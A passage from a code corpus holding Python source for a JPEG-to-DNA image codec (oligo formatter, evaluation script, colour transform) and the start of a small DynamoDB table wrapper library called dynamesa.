print(f"alpha: {self.alpha}")
```
#### File: jpegdna/format/jpegdnaformatter.py
```python
from jpegdna.format import AbstractFormatter, GeneralInfoFormatter, GrayFrequenciesFormatter, RGBFrequenciesFormatter, DataFormatter
from jpegdna.tools.strand_tools import compute_length
class JpegDNAFormatter(AbstractFormatter):
"""Jpeg DNA gray level formatter class
:param aplha: Alpha value (quantization step multiplier)
:type alpha: float
:param freq_origin: Choose between default and adapted frequencies
:type freq_origin: str
:param primer: Primer name used
:type primer: str
"""
DEFAULT_DC_FRQ_LEN = 7
DEFAULT_AC_FREQ_LEN = 10
DEFAULT_MAX_CAT = 11
DEFAULT_MAX_RUNCAT = 162
DEFAULT_BLOCKDIMS = (8, 8)
DEFAULT_CENTERING_OFFSET = 75
DEFAULT_GENERAL_INFO_HEADER = "AATAATA"
DEFAULT_FREQS_INFO_HEADER = "ATCCGTC"
DEFAULT_DATA_INFO_HEADER = "TTGAGGA"
DEFAULT_DC_FREQ_HEADER = "ATTC"
DEFAULT_AC_FREQ_HEADER = "AGAG"
PRIMERS = {
"none" : ("", ""),
"illumina" : ("GTTCAGAGTTCTACAGTCCGACGATC", "TGGAATTCTCGGGTGCCAAGG")
}
PRIMER_LENGTHS = {
"none" : (0, 0),
"illumina" : (26, 21)
}
def __init__(self, alpha, image_type, sampler="4:2:2", freq_origin=None, primer="illumina", oligo_length=200, debug=False):
self.debug = debug
self.primer = None
self.primer_type = primer
self.set_primer()
self.alpha = alpha
self.freq_dc, self.freq_ac, self.m, self.n = None, None, None, None
self.oligo_length = oligo_length
if debug:
self.general_info_header = "\033[33m" + self.DEFAULT_GENERAL_INFO_HEADER + "\033[0m"
self.freqs_info_header = "\033[33m" + self.DEFAULT_FREQS_INFO_HEADER + "\033[0m"
self.data_info_header = "\033[33m" + self.DEFAULT_DATA_INFO_HEADER + "\033[0m"
self.dc_freq_header = "\033[32m" + self.DEFAULT_DC_FREQ_HEADER + "\033[36m"
self.ac_freq_header = "\033[32m" + self.DEFAULT_AC_FREQ_HEADER + "\033[36m"
else:
self.general_info_header = self.DEFAULT_GENERAL_INFO_HEADER
self.freqs_info_header = self.DEFAULT_FREQS_INFO_HEADER
self.data_info_header = self.DEFAULT_DATA_INFO_HEADER
self.dc_freq_header = self.DEFAULT_DC_FREQ_HEADER
self.ac_freq_header = self.DEFAULT_AC_FREQ_HEADER
self.general_info_header_len = len(self.DEFAULT_GENERAL_INFO_HEADER)
self.freqs_info_header_len = len(self.DEFAULT_FREQS_INFO_HEADER)
self.data_info_header_len = len(self.DEFAULT_DATA_INFO_HEADER)
self.freq_type_header_len = len(self.DEFAULT_AC_FREQ_HEADER)
self.image_id = "AATTC"
self.image_id_len = len(self.image_id)
self.parity_len = 4
self.sense_len = 2
self.blockdims = self.DEFAULT_BLOCKDIMS
self.freq_origin = freq_origin
if self.freq_origin == "from_img":
self.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.max_cat = self.DEFAULT_MAX_CAT
self.max_runcat = self.DEFAULT_MAX_RUNCAT
elif self.freq_origin == "default" or self.freq_origin == "from_file" or self.freq_origin is None:
self.dc_freq_len = 0
self.ac_freq_len = 0
self.max_cat = 0
self.max_runcat = 0
else:
raise ValueError("Wrong freq_origin parameter")
self.centering_offset = self.DEFAULT_CENTERING_OFFSET
self.image_type = image_type
self.sampler = sampler
self.general_info_formatter = GeneralInfoFormatter(self.alpha,
self.freq_origin,
self.m,
self.n,
self.blockdims,
self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.image_type,
self.sampler,
self.DEFAULT_GENERAL_INFO_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.general_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len),
debug=debug)
if self.image_type == "gray":
self.frequency_formatter = GrayFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=debug)
elif self.image_type == "RGB":
self.DEFAULT_MAX_CAT = 11 * 3 # pylint: disable = invalid-name
self.DEFAULT_MAX_RUNCAT = 162 * 3 # pylint: disable = invalid-name
self.frequency_formatter = RGBFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=debug)
else:
self.frequency_formatter = None
self.data_formatter = DataFormatter(self.DEFAULT_DATA_INFO_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.data_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len),
debug=debug)
def set_primer(self):
"""Sets the primer from the primer type"""
self.primer_length = sum(self.PRIMER_LENGTHS[self.primer_type])
try:
if self.debug:
self.primer = ("\033[31m" + self.PRIMERS[self.primer_type][0] + "\033[0m",
"\033[31m" + self.PRIMERS[self.primer_type][1] + "\033[0m")
else:
self.primer = self.PRIMERS[self.primer_type]
except:
raise ValueError("Non-existing primer")
def set_alpha(self, alpha):
"""Set alpha value"""
self.alpha = alpha
self.general_info_formatter.alpha = alpha
def set_freq_origin(self, choice):
"""Set frequency origin"""
if choice in ["from_img", "from_file", "default"]:
self.freq_origin = choice
else:
raise ValueError("Wrong freq origin")
if self.freq_origin == "from_img":
self.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.general_info_formatter.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.general_info_formatter.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.frequency_formatter.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.frequency_formatter.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
elif self.freq_origin == "default" or self.freq_origin == "from_file":
self.dc_freq_len = 0
self.ac_freq_len = 0
self.general_info_formatter.dc_freq_len = 0
self.general_info_formatter.ac_freq_len = 0
self.frequency_formatter.dc_freq_len = 0
self.frequency_formatter.ac_freq_len = 0
self.max_cat = self.DEFAULT_MAX_CAT
self.max_runcat = self.DEFAULT_MAX_RUNCAT
self.general_info_formatter.max_cat = self.DEFAULT_MAX_CAT
self.general_info_formatter.max_runcat = self.DEFAULT_MAX_RUNCAT
self.frequency_formatter.max_cat = self.DEFAULT_MAX_CAT
self.frequency_formatter.max_runcat = self.DEFAULT_MAX_RUNCAT
def set_state(self, *args, case=None):
if case == "format":
if len(args) < 3:
raise ValueError("Wrong argument number")
self.set_freq_origin(args[0])
self.m = args[1]
self.n = args[2]
self.general_info_formatter.m = args[1]
self.general_info_formatter.n = args[2]
if self.freq_origin == "from_img":
if len(args) != 5:
raise ValueError("Wrong argument number")
if isinstance(args[3], tuple) and isinstance(args[4], tuple):
self.freq_dc = (args[3][0].astype(int),
args[3][1].astype(int),
args[3][2].astype(int))
self.freq_ac = (args[4][0].astype(int),
args[4][1].astype(int),
args[4][2].astype(int))
else:
self.freq_dc = args[3].astype(int)
self.freq_ac = args[4].astype(int)
else:
raise ValueError
def get_state(self, case=None):
if case == "deformat":
return self.alpha, self.m, self.n, self.freq_dc, self.freq_ac
else:
raise ValueError
def full_format(self, inp, *args):
self.set_state(*args, case="format")
oligos = self.format(inp)
if self.debug:
for oligo in oligos:
print(oligo)
return oligos
def full_deformat(self, oligos, *args):
data_strand = self.deformat(oligos)
return data_strand, self.get_state(case="deformat")
def format(self, inp):
oligos = ([self.general_info_formatter.format(None)] +
self.frequency_formatter.format((self.freq_dc, self.freq_ac)) +
self.data_formatter.format(inp))
if self.debug:
for oligo in oligos:
print(oligo)
return self.add_primers_and_sense(self.add_ids(oligos, self.centering_offset))
def deformat(self, oligos):
oligos_cleanup = [None] * len(oligos)
for i, oligo in enumerate(oligos):
oligos_cleanup[i] = ""
for char in oligo:
if char in ["A", "T", "C", "G"]:
oligos_cleanup[i] += char
if self.debug:
for oligo in oligos_cleanup:
print(oligo)
payload_strands = self.get_payload(oligos_cleanup)
general_info_strand, freq_strands, data_strands = None, [], []
for strand in payload_strands:
header = strand[:7]
substrand = strand[7:]
if self.debug:
print("\033[33m" + header + "\033[0m" + substrand)
if "\033[33m" + header + "\033[0m" == self.general_info_header:
general_info_strand = substrand
elif "\033[33m" + header + "\033[0m" == self.freqs_info_header:
freq_strands.append(substrand)
elif "\033[33m" + header + "\033[0m" == self.data_info_header:
data_strands.append(substrand)
else:
raise ValueError("Wrong header")
else:
if header == self.general_info_header:
general_info_strand = substrand
elif header == self.freqs_info_header:
freq_strands.append(substrand)
elif header == self.data_info_header:
data_strands.append(substrand)
else:
raise ValueError("Wrong header")
# General info
self.general_info_formatter.deformat(general_info_strand)
self.image_type = self.general_info_formatter.IMAGE_TYPES[self.general_info_formatter.image_type]
self.sampler = self.general_info_formatter.sampler
if self.image_type == "gray":
self.frequency_formatter = GrayFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=self.debug)
elif self.image_type == "RGB":
self.DEFAULT_MAX_CAT = 11 * 3 # pylint: disable = invalid-name
self.DEFAULT_MAX_RUNCAT = 162 * 3 # pylint: disable = invalid-name
self.frequency_formatter = RGBFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=self.debug)
self.freq_origin = self.general_info_formatter.freq_origin
self.alpha = self.general_info_formatter.alpha
self.blockdims = self.general_info_formatter.blockdims
self.m, self.n = self.general_info_formatter.m, self.general_info_formatter.n
# Frequencies
if self.freq_origin == "from_img":
self.max_cat = self.general_info_formatter.max_cat
self.max_runcat = self.general_info_formatter.max_runcat
self.dc_freq_len = self.general_info_formatter.dc_freq_len
self.ac_freq_len = self.general_info_formatter.ac_freq_len
self.frequency_formatter.dc_freq_len = self.general_info_formatter.dc_freq_len
self.frequency_formatter.ac_freq_len = self.general_info_formatter.ac_freq_len
self.frequency_formatter.max_cat = self.general_info_formatter.max_cat
self.frequency_formatter.max_runcat = self.general_info_formatter.max_runcat
(self.freq_dc, self.freq_ac) = self.frequency_formatter.deformat(freq_strands)
if self.debug:
print(f"DC frequencies : {self.freq_dc}")
print(f"AC frequencies : {self.freq_ac}")
#if RGB
elif self.DEFAULT_MAX_CAT == 33 and self.DEFAULT_MAX_RUNCAT == 162*3:
self.freq_ac = (None, None, None)
self.freq_dc = (None, None, None)
# Data strand
data_strand = self.data_formatter.deformat(data_strands)
if self.debug:
print(f"Data strand: {data_strand}")
return data_strand
def add_ids(self, oligos, n):
"""Adding primers to formatted oligos
:param oligos: list of formatted oligos without offset
:type oligos: list
:return: list of oligos with offset added at the beginning of each oligo
:rtpye: list
"""
res = []
for el in oligos:
el1, el2 = self.cut_payload(el, n)
if self.debug:
res.append(el1 + "\033[34m" + self.image_id + "\033[35m" + self.add_parity_strand(el, self.image_id, self.add_sense_nt('end')) + el2)
else:
res.append(el1 + self.image_id + self.add_parity_strand(el, self.image_id, self.add_sense_nt('end')) + el2)
return res
def add_primers_and_sense(self, oligos):
"""Adding primers to formatted oligos
:param oligos: list of formatted oligos without primers
:type oligos: list
:return: list of oligos with primers added at the beginning and at the end of each oligo
:rtpye: list
"""
res = []
for el in oligos:
if self.debug:
res.append(self.primer[0] + "\033[0;32m" + self.add_sense_nt("begin") + "\033[0m" + el + "\033[0;32m" + self.add_sense_nt("end") + "\033[0m" + self.primer[1])
else:
res.append(self.primer[0] + self.add_sense_nt("begin") + el + self.add_sense_nt("end") + self.primer[1])
return res
def get_payload(self, oligos):
"""Taking primers and sense nts off formatted oligos
:param oligos: list of formatted oligos without primers
:type oligos: list
:return: list of oligos with primers added at the beginning and at the end of each oligo
:rtpye: list
"""
res = []
payload_strands = []
if self.debug:
for oligo in oligos:
payload_strands.append(oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):-(compute_length(self.primer[1])+1)] +
oligo[compute_length(self.primer[0])+1:compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)])
res.append("\033[31m" + oligo[:compute_length(self.primer[0])] +
"\033[32m" + oligo[compute_length(self.primer[0])] +
"\033[0m" + oligo[compute_length(self.primer[0])+1:
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)] +
"\033[34m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58):
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 53)] +
"\033[35m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 53):
compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49)] +
"\033[0m" + oligo[compute_length(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):
-(compute_length(self.primer[1])+1)] +
"\033[32m" + oligo[-(compute_length(self.primer[1])+1)] +
"\033[31m" + oligo[-(compute_length(self.primer[1])):] + "\033[0m")
else:
for oligo in oligos:
payload_strands.append(oligo[len(self.primer[0])+1+(self.oligo_length - self.centering_offset - 49):-(len(self.primer[1])+1)] +
oligo[len(self.primer[0])+1:len(self.primer[0])+1+(self.oligo_length - self.centering_offset - 58)])
if self.debug:
for oligo in res:
print(oligo)
return payload_strands
def add_sense_nt(self, pos):
"""Compute the sens nucleotide either the beginning one or the ending one
:param pos: either "begin" or "end", position of the sense nt to compute
:type pos: str
:returns: sense nucleotide
:rtype: str
"""
if pos == "begin":
if self.primer[0][-1] == "A":
return "T"
return "A"
elif pos == "end":
if self.primer[1][0] == "C":
return "G"
return "C"
else:
raise ValueError
def add_parity_strand(self, data, image_id, sense_nt):
"""Computes the parity strand for the current oligo
:param data: strand on which to compute parities for each base
:type data: str
:param image_id: id of the image
:type image_id: str
:param sense_nt: sense nucelotide
:type sens_nt: str
"""
parity = [data.count("A")%2,
data.count("T")%2,
data.count("C")%2,
data.count("G")%2]
strand = [None]*4
# First element
if parity[0] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if image_id[-1] != first_candidate:
strand[0] = first_candidate
else:
strand[0] = second_candidate
# Last element
if parity[-1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if sense_nt != first_candidate:
strand[-1] = first_candidate
else:
strand[-1] = second_candidate
#Middle elements : case with different parities (simple)
if parity[1] != parity[2]:
# Second element
if parity[1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[0] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
# Third element
if parity[2] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[3] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
# Middle elements: case with same parities (hard)
else:
if parity[0] == parity[-1] or parity[0] == parity[1]:
if parity[1] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[0] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
if strand[1] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
else:
if parity[2] == 0:
first_candidate = "A"
second_candidate = "T"
else:
first_candidate = "C"
second_candidate = "G"
if strand[3] != first_candidate:
strand[2] = first_candidate
else:
strand[2] = second_candidate
if strand[2] != first_candidate:
strand[1] = first_candidate
else:
strand[1] = second_candidate
return "".join(strand)
def cut_payload(self, el, n):
"""Cuts the payoad in two halves after the n-th nucleotide
:param el: Stand to be cut
:type el: string
:returns: Two cuts
:rtype: Tuple(string)
"""
count = 0
pos = 0
for char in el:
pos += 1
if char in ["A", "T", "C", "G"]:
count += 1
if count == n:
break
return el[pos:], el[:pos]
```
#### File: jpegdna/scripts/jpegdna_eval.py
```python
from pathlib import Path
from dataclasses import make_dataclass
import math
import pickle
from skimage import io
import pandas as pd
from pandas import ExcelWriter
import jpegdna
from jpegdna.codecs import JPEGDNAGray
# Choose between "from_img" and "default" for the frequencies
CHOICE = "from_img"
# Enables formatting (if True, bit-rate will be estimated with format taken into account)
FORMATTING = True
def stats(func):
"""Stats printing and exception handling decorator"""
def inner(*args):
try:
code, decoded = func(*args)
except ValueError as err:
print(err)
else:
if FORMATTING:
code_length = 0
for el in code:
code_length += len(el)
compression_rate = 8 * args[0].shape[0] * args[0].shape[1] / code_length
else:
compression_rate = 8 * args[0].shape[0] * args[0].shape[1] / len(code)
diff = (args[0].astype(int)-decoded.astype(int))
# plt.imshow(decoded, cmap='gray')
# plt.show()
mean_squarred_error = 0
for i in range(len(diff)):
for j in range(len(diff[0])):
mean_squarred_error += diff[i, j]**2
mean_squarred_error /= len(diff)
mean_squarred_error /= len(diff[0])
psnr = 10 * math.log10((255*255)/mean_squarred_error)
print(f"Mean squared error: {mean_squarred_error}")
print(f"PSNR: {psnr}")
print(f"Compression rate: {compression_rate} bits/nt")
# io.imsave(str(compression_rate) + ".png", decoded)
return compression_rate, psnr
return inner
def encode_decode(img, alpha):
"""Function for encoding and decoding"""
# Coding
codec = JPEGDNAGray(alpha, formatting=FORMATTING, verbose=False, verbosity=3)
if CHOICE == "from_img":
if FORMATTING:
oligos = codec.full_encode(img, "from_img")
else:
(code, res) = codec.full_encode(img, "from_img")
elif CHOICE == "from_file":
with open(Path(jpegdna.__path__[0] + "/data/freqs.pkl"), "rb") as file:
freqs = pickle.load(file)
(code, res) = codec.full_encode(img, "from_file", freqs['freq_dc'], freqs['freq_ac'])
elif CHOICE == "default":
if FORMATTING:
oligos = codec.full_encode(img, "default")
else:
(code, res) = codec.full_encode(img, "default")
# Decoding
codec2 = JPEGDNAGray(alpha, formatting=FORMATTING, verbose=False, verbosity=3)
if CHOICE == "from_img":
if FORMATTING:
decoded = codec2.full_decode(oligos, "from_img")
else:
decoded = codec2.full_decode(code, "from_img", res[1], res[2], res[3], res[4])
elif CHOICE == "from_file":
with open(Path(jpegdna.__path__[0] + "/data/freqs.pkl"), "rb") as file:
freqs = pickle.load(file)
decoded = codec2.full_decode(code, "from_file", res[1], res[2], freqs['freq_dc'], freqs['freq_ac'])
elif CHOICE == "default":
if FORMATTING:
decoded = codec2.full_decode(oligos, "default")
else:
decoded = codec2.full_decode(code, "default", res[1], res[2])
if FORMATTING:
return oligos, decoded
return code, decoded
@stats
def experiment(img, alpha):
"""Full experiment with stats and exception handling"""
return encode_decode(img, alpha)
# pylint: disable=missing-function-docstring
def main():
value = make_dataclass("value", [("Compressionrate", float), ("PSNR", float)])
general_results = []
img_names = ["kodim_gray_1.png", "kodim_gray_2.png", "kodim_gray_3.png", "kodim_gray_4.png", "kodim_gray_5.png"]
for i in range(len(img_names)):
img_name = img_names[i]
img = io.imread(Path(jpegdna.__path__[0] + "/../img/" + img_name))
values = []
for alpha in [1e-5, 0.145, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]:
print("==================================")
print(f"Alpha: {alpha}")
res = experiment(img, alpha)
if res is not None:
compression_rate, psnr = res
values.append(value(compression_rate, psnr))
general_results.append(values)
with ExcelWriter("res/results.xlsx") as writer: # pylint: disable=abstract-class-instantiated
for i in range(len(general_results)):
dtf = pd.DataFrame(general_results[i])
dtf.to_excel(writer, sheet_name=img_names[i], index=None, header=True)
# pylint: enable=missing-function-docstring
if __name__ == '__main__':
main()
```
#### File: jpegdna/transforms/colortransform.py
```python
import cv2
from jpegdna.transforms import AbstractTransform
class RGBYCbCr(AbstractTransform):
"""RGB YCbCr color converter"""
def forward(self, inp):
"""Wrapper method to covert RGB to YCbCr
:param inp: Input image
:type inp: np.array
:return: YCbCr image
:rtype: np.array
"""
res = cv2.cvtColor(inp, cv2.COLOR_RGB2YCrCb)
res[:, :, 1], res[:, :, 2] = res[:, :, 2], res[:, :, 1].copy()
return res
def inverse(self, inp):
"""Wrapper method to covert YCbCr to RGB
:param inp: Input YCbCr image
:type inp: np.array
:return: RGB image
:rtype: np.array
"""
inp[:, :, 1], inp[:, :, 2] = inp[:, :, 2], inp[:, :, 1].copy()
return cv2.cvtColor(inp, cv2.COLOR_YCrCb2RGB)
``` |
{
"source": "jiaaro/dynamesa",
"score": 2
} |
#### File: jiaaro/dynamesa/dynamesa.py
```python
import dataclasses
import functools
import operator
import unittest
from itertools import zip_longest
import typing as ty
import boto3 # type: ignore
# for easy access
from boto3.dynamodb.conditions import Key, Attr # type: ignore
# sentinal values
from botocore.exceptions import ClientError
class Sentinal:
def __init__(self, name):
self.name = name
def __repr__(self):
return f"<Sentinal: {self.name!r}>"
def __copy__(self):
return self
def __deepcopy__(self, memodict={}):
memodict[id(self)] = self
return self
PRIMARY_KEY = Sentinal("Primary Key")
REMOVE_KEY = Sentinal("Remove Key")
MISSING_KEY = Sentinal("Missing Key")
class DoesNotExist(Exception):
pass
def itemdict(item) -> ty.Dict:
if isinstance(item, dict):
d = item
elif hasattr(item, "asdict"):
d = item.asdict()
else:
d = dataclasses.asdict(item)
return {k: v for (k, v) in d.items() if v is not MISSING_KEY}
T = ty.TypeVar("T", ty.Dict[str, ty.Any], ty.Any)
class Table(ty.Generic[T]):
def __init__(self, table_name: str, item_type: ty.Type[T] = dict, **kwargs):
dynamodb = boto3.resource("dynamodb", **kwargs)
self.item_type: ty.Type[T] = item_type
self.table = dynamodb.Table(table_name)
self.DoesNotExist = type(f"DoesNotExist", (DoesNotExist,), {})
def __repr__(self):
return f"<Table: {self.table.name}>"
def __str__(self):
return f"{self.table.name} ({self.table.creation_date_time:%Y-%m-%d}, {self.table.item_count} items)"
def get(self, **kwargs) -> T:
dynamo_key = {}
for k in self.table.key_schema:
if k["AttributeName"] not in kwargs:
raise ValueError(
f"table.get was missing {k['KeyType']} key, {k['AttributeName']} for table {self.table.name}"
)
else:
dynamo_key[k["AttributeName"]] = kwargs[k["AttributeName"]]
unexpected_kwargs = set(kwargs.keys()) - set(dynamo_key.keys())
if unexpected_kwargs:
raise ValueError(f"table.get recieved unexpected keyword arguments: {unexpected_kwargs!r}")
item = self.table.get_item(Key=dynamo_key).get("Item")
if not item:
raise self.DoesNotExist(dynamo_key)
return self.item_type(**item)
def put(self, item: T) -> T:
self.table.put_item(Item=itemdict(item))
return item
def update(self, update: dict, return_values: str = "ALL_NEW") -> ty.Union[T, dict, None]:
"""
Takes a table and a dictionary of updates, extracts the primary key from the
update dict and applies the remaining keys as an update to the record.
Pass return_values="NONE" if you don't care what the resulting record is.
"""
table = self.table
orig_update = update
update = itemdict(update).copy()
pk = {}
for k in table.key_schema:
key = k["AttributeName"]
if key not in update:
raise ValueError(
f"Couldn't update {table.table_name} because update dict is missing the {k['KeyType']} key, {key:!r}"
)
pk[key] = update.pop(key)
if not update:
raise ValueError("There were no updates to apply, update dict contained only the primary key")
expression_attrs = {}
expression_vals = {}
set_parts = []
remove_parts = []
for i, (key, val) in enumerate(update.items()):
expression_attrs[f"#a{i}"] = key
if val is MISSING_KEY:
continue
elif val is REMOVE_KEY:
if isinstance(orig_update, dict):
orig_update.pop(key)
else:
setattr(orig_update, key, MISSING_KEY)
remove_parts.append(f"#a{i}")
else:
expression_vals[f":v{i}"] = val
set_parts.append(f"#a{i} = :v{i}")
update_expression = ""
if set_parts:
update_expression += "SET " + ", ".join(set_parts)
if remove_parts:
update_expression += " REMOVE " + ", ".join(remove_parts)
kwargs = {}
if expression_attrs:
kwargs["ExpressionAttributeNames"] = expression_attrs
if expression_vals:
kwargs["ExpressionAttributeValues"] = expression_vals
res = table.update_item(
Key=pk,
ReturnValues=return_values,
UpdateExpression=update_expression,
**kwargs,
)
item = res.get("Attributes")
if return_values == "ALL_NEW":
item = self.item_type(**item)
return item
def find(self, *args, **kwargs) -> ty.Generator[T, None, None]:
# if the first arg is a string, it's the name of the index to use
index_name = None
if args and (args[0] is PRIMARY_KEY or isinstance(args[0], str)):
index_name = args[0]
args = args[1:]
paginate_kwargs = {}
if index_name:
if index_name is not PRIMARY_KEY:
paginate_kwargs["IndexName"] = index_name
# When there is a positional arg after the index name, it's a key condition expression
if args and args[0]:
paginate_kwargs["KeyConditionExpression"] = args[0]
args = args[1:]
else:
if index_name is PRIMARY_KEY:
idx_key_schema = self.table.key_schema
else:
idx = next(idx for idx in self.table.global_secondary_indexes if idx["IndexName"] == index_name)
idx_key_schema = idx["KeySchema"]
idx_keys = {a["AttributeName"] for a in idx_key_schema}
paginate_kwargs["KeyConditionExpression"] = functools.reduce(
operator.and_, [Key(k).eq(kwargs[k]) for k in idx_keys]
)
filters = [Key(k).eq(v) for k, v in kwargs.items() if k not in idx_keys]
if args:
assert (
len(args) == 1
), "table.find takes at most 3 positional arguments: index name, key condition expression, and filter expression"
filters.append(args[0])
if filters:
paginate_kwargs["FilterExpression"] = functools.reduce(operator.and_, filters)
elif args or kwargs:
filters = [Key(k).eq(v) for k, v in kwargs.items()]
if args:
assert len(args) == 1
filters.append(args[0])
paginate_kwargs["FilterExpression"] = functools.reduce(operator.and_, filters)
client = self.table.meta.client
if index_name:
paginator = client.get_paginator("query").paginate(TableName=self.table.name, **paginate_kwargs)
else:
paginator = client.get_paginator("scan").paginate(TableName=self.table.name, **paginate_kwargs)
for page in paginator:
for item in page["Items"]:
yield self.item_type(**item)
def clear(self, *args, **kwargs) -> None:
with self.table.batch_writer() as batch:
for item in self.find(*args, **kwargs):
item = itemdict(item)
batch.delete_item(Key={k["AttributeName"]: item[k["AttributeName"]] for k in self.table.key_schema})
# Either (Hash key, type) or (hash key, hashkey type, range key, range key type)
DynamesaIndexType = ty.Union[ty.Tuple[str, str], ty.Tuple[str, str, str, str]]
class _TableGetter:
_resource_kwargs: ty.Dict[str, ty.Any] = {}
_tables: ty.Dict[ty.Tuple[str, ty.Type], Table] = {}
table_name_prefix: str = ""
def configure(self, **kwargs) -> None:
self._resource_kwargs.update(kwargs)
@property
def dynamodb(self):
return boto3.resource("dynamodb", **self._resource_kwargs)
def reload(self) -> None:
res = self.dynamodb.meta.client.list_tables()
self._tables = {}
for tablename in res["TableNames"]:
self._tables[tablename, dict] = Table(tablename, **self._resource_kwargs)
def create(
self,
table_name: str,
pk: DynamesaIndexType,
gsis: ty.Dict[str, DynamesaIndexType] = {},
lsis: ty.Dict[str, DynamesaIndexType] = {},
item_type: ty.Type[T] = dict,
) -> Table[T]:
prefixed_table_name = f"{self.table_name_prefix}{table_name}"
attribute_types = {}
def parse_index(idx: DynamesaIndexType) -> ty.List[ty.Dict[str, ty.Any]]:
assert len(idx) % 2 == 0
key_types = ("HASH", "RANGE")
index = []
for i, (k, dynamotype) in enumerate(zip_longest(*[iter(idx)] * 2)):
attribute_types[k] = dynamotype
index.append({"AttributeName": k, "KeyType": key_types[i]})
return index
create_kwargs = {}
create_kwargs["KeySchema"] = parse_index(pk)
for idx_name, idx_def in gsis.items():
create_kwargs.setdefault("GlobalSecondaryIndexes", [])
create_kwargs["GlobalSecondaryIndexes"].append(
{
"IndexName": idx_name,
"KeySchema": parse_index(idx_def),
"Projection": {"ProjectionType": "ALL"},
"ProvisionedThroughput": {"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
}
)
for idx_name, idx_def in lsis.items():
create_kwargs.setdefault("LocalSecondaryIndexes", [])
create_kwargs["LocalSecondaryIndexes"].append(
{
"IndexName": idx_name,
"KeySchema": parse_index(idx_def),
"Projection": {"ProjectionType": "ALL"},
"ProvisionedThroughput": {"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
}
)
table = self.dynamodb.create_table(
TableName=prefixed_table_name,
AttributeDefinitions=[{"AttributeName": k, "AttributeType": t} for k, t in attribute_types.items()],
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
**create_kwargs,
)
table.meta.client.get_waiter("table_exists").wait(TableName=prefixed_table_name)
return self.get(table_name, item_type)
def delete(self, table_name):
if isinstance(table_name, Table):
prefixed_table_name = table_name.table.name
else:
prefixed_table_name = f"{self.table_name_prefix}{table_name}"
self.dynamodb.meta.client.delete_table(TableName=prefixed_table_name)
self.dynamodb.meta.client.get_waiter("table_not_exists").wait(TableName=prefixed_table_name)
for table_key in list(self._tables.keys()):
if table_key[0] == prefixed_table_name:
self._tables.pop(table_key)
def get(self, table_name: str, item_type: ty.Type[T] = dict) -> Table[T]:
table_name = f"{self.table_name_prefix}{table_name}"
if (table_name, dict) not in self._tables:
self.reload()
if (table_name, item_type) in self._tables:
return self._tables[table_name, item_type]
table = Table(table_name, item_type=item_type, **self._resource_kwargs)
self._tables[table_name, item_type] = table
return table
def __getattr__(self, table_name) -> Table:
if not table_name.startswith("__"):
return self.get(table_name)
def __getitem__(self, table_name) -> Table:
return self.get(table_name)
def __iter__(self) -> ty.Iterator[Table]:
if not self._tables:
self.reload()
return iter(t for t in self._tables.values() if t.table.name.startswith(self.table_name_prefix))
def __len__(self):
if not self._tables:
self.reload()
return len(self._tables)
